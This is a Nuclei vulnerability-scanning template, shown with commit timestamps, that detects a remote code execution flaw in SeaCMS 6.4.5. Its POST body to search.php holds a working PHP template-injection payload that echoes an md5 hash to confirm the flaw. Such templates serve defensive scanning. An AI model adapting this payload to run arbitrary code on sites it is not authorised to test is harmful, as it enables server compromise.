nuclei-templates/vulnerabilities/other/seacms-rce.yaml

28 lines
670 B
YAML
Raw Normal View History

2021-02-18 13:05:35 +00:00
id: seacms-rce
2021-02-18 13:05:35 +00:00
info:
name: SeaCMS V6.4.5 RCE
author: pikpikcu
severity: high
2021-10-26 12:29:20 +00:00
description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code.
reference:
- https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
2021-02-18 13:05:35 +00:00
tags: seacms,rce
requests:
- method: POST
path:
- '{{BaseURL}}/search.php?searchtype=5'
2022-11-02 13:22:01 +00:00
body: "searchtype=5&order=}{end if} {if:1)echo md5('seacms');if(1}{end if}"
2021-02-18 13:05:35 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-11-02 13:20:37 +00:00
words:
- "b1e597fa44dfd7669966bfab04eeb8ea"
2021-02-18 13:05:35 +00:00
- type: status
status:
- 200